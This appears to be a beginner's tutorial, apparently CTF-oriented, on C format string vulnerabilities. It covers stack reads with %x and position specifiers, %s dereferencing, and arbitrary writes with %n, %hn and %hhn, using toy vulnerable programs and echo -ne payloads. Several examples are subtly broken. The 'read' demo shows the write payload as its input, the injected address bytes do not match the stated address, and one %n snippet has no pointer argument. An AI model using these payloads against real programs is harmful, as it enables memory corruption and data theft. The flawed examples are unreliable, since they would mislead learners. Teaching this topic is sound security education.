Beginner's Guide to Format String Vulns

Overview

Format String vulnerabilities are well known, and allow an attacker to read or write to arbitrary memory addresses.

If the programmer did not provide a format string for printf to use and instead wrote something like printf(someVariable);, printf will interpret whatever is in someVariable as a format string.

Reading Memory On the Stack

The simplest format string exploit is printing values off the stack.

int a = 0xa;
int b = 0xb;
printf("%x %x %x %x", a, b); 
// prints "a b fffffff fffffff" where the last two are 
// whatever data was on the stack following 0xa and 0xb

Position Specifier

Format strings can specify which argument to print by using the position specifier $.

int a = 0xa;
int b = 0xb;
printf("%2$x %1$x", a, b); // prints "b a"

When this is run on a 32-bit system, the stack looks like this when printf is called:

------------------
|  *"%2$d %1$d"  |
------------------
|       0xa      |
------------------
|       0xb      |
------------------
|   other data   |
------------------

By setting the position specifier to a number higher than the number of arguments, we can read whatever memory we want as long as it’s further down the stack.

int a = 0xa;
int b = 0xb;
printf("%3$x %4$x", a, b); 
// prints whatever two words come after b on the stack

Note on amd64 printf

On 64-bit Intel systems, the program will put the first six arguments to printf in registers in the following order:

RDI, RSI, RDX, RCX, R8, R9

Any remaining arguments to printf are put on the stack.

Dereferencing Pointers on the Stack

We can dereference pointers on the stack with the string format specifier %s.

printf("%x %x %x %s");

Oh %no! Overwriting Memory On the Stack

printf accepts a number of special symbols that begin with % to print out data in various formats. One of the symbols lesser known to regular C programmers is %n, which counts the number of characters printf has printed up to that point, and puts the count into the referenced variable.

Basic %n usage:

int count = 0;

// prints "this is my string" and writes 17 to count
printf("this is my string%n", &count); 

 // prints 17
printf("%d", count);

Width Specifier

The printf width specifier can be used to have a short format string print a large number of characters.

Width specifier usage:

printf("%9c", 'a'); // prints "        a" 

prints c preceeded by 8 spaces, bringing the total number of characters output up to 9.

Writing memory

To write arbitrary data with %n, you must simply figure out how many characters printf has pointed up to the point where the %n is found in the format string, and adjust the width specifier accordingly.

int dontTouchMe = 0;
printf("%1337c%2$n", 'a'); 
printf("%d", dontTouchMe); 

You can specify how much data you want to write by prepending h’s to the n.

%n   -- writes four bytes
%hn  -- writes two bytes
%hhn -- writes one byte

Reading Arbitrary Memory

So we can read and write data further down the stack, but what about other memory?

If we put the address we want to read on the stack, we can use the %s string specifier to dereference the address and output the data until printf encounters a null byte.

Consider the following example where a string is put on the heap:

void heap() {
  char* secretString = malloc(40);
  strcpy(secretString, "this is my secret string");
  return;
}
int main() {
  heap();
  char input[256];
  fgets(input, 256, stdin);
  printf(input);
  return 0;
}

The secret string gets put on the heap at 0x804b008 which we can determine using a debugger. Note that if the binary is compiled with PIE the address the heap is mapped at will be randomized each time the program is executed.

To read from that address we’ll input the string: \x08\xb0\x4b\x08 %7$s

Output:

brad@ctf$ echo -ne "\x08\xb0\x4b\x08 %63c %6\$n" | ./test
 this is my secret string

This is the stack at the time printf is called:

0000| 0xffffcee0 --> 0xffffcefc  // Pointer to our input ("1st" arg to printf)
0004| 0xffffcee4 --> 0x100
0008| 0xffffcee8 --> 0xf7f925a0
0012| 0xffffceec --> 0x8048574 
0016| 0xffffcef0 --> 0xf7ffd000 
0020| 0xffffcef4 --> 0x8048290
0024| 0xffffcef8 --> 0xf7de8e18
0028| 0xffffcefc --> 0x804b008   // Beginning of our input
0032| 0xffffcf00 (" %7$s")       // Our format string
0036| 0xffffcf04 --> 0xf7dd0073  // Our input ends here with a 0x73 ('s') and a NULL byte
0040| 0xffffcf08 --> 0x7b1ea71

Our input was put into the stack at ESP+28 during the fgets call. We used the %7$s to print the 7th “argument” to printf, which was the address we inserted at the beginning of our input. Cool!

Writing Arbitrary Memory

Writing arbitrary memory works pretty much the same way, but instead of %s we’ll use %n. Note that since we’re injecting additional data before the format specifiers, when we are specifying the data to write with a width specifier, we must be careful to calculate in the characters we’ve already printed.

Consider the following example:

int* heap() {
  int* dontTouch = malloc(4);
  *dontTouch = 0x0;
  return dontTouch;
}
int main() {
  int* dontTouch = heap();
  char input[256];
  fgets(input, 256, stdin);
  printf(input);
  printf("%d", *dontTouch);
  return 0;
}

When we debug we see that dontTouch is a pointer to the heap address 0x0804b008. By combining the width specifier with the %n format specifier, we can write the number 69 to dontTouch.

brad@ctf$ echo -ne "\x08\xb0\x4b\x08 %63c %6\$n" | ./test

                                 69

Note how in order to get 69 we must input 63. This is because printf has printed 6 characters in addition to the 63 characters we asked it to print with the %63c specifier.

4 bytes of our address + 1 space + 63 chars + 1 space = 69

In order to write arbitrary data you’ll need to make these calculations when you craft your format string.

To prevent thousands of characters from being printed when writing large values, we can break up our format string to write multiple bytes to 0x0804b009 and 0x0804b008.

To print 1337, we can chain together two one byte writes:

brad@ctf$ echo -ne "\x09\xb0\x04\x08\x08\xb0\x04\x08 %251c %7\$hhn %50c %8\$hhn" | ./test

 
                                             1337

Since 1337 == 0x0539, we need our first write to be 5. The two addresses will put the first %n write over 5, we need to overflow it by printing 251 chars.

(251 chars + 10 bytes of addresses and spaces) % 256 == 5

To get our second write to 0x39 (57), we add an additional 50 chars before the second write.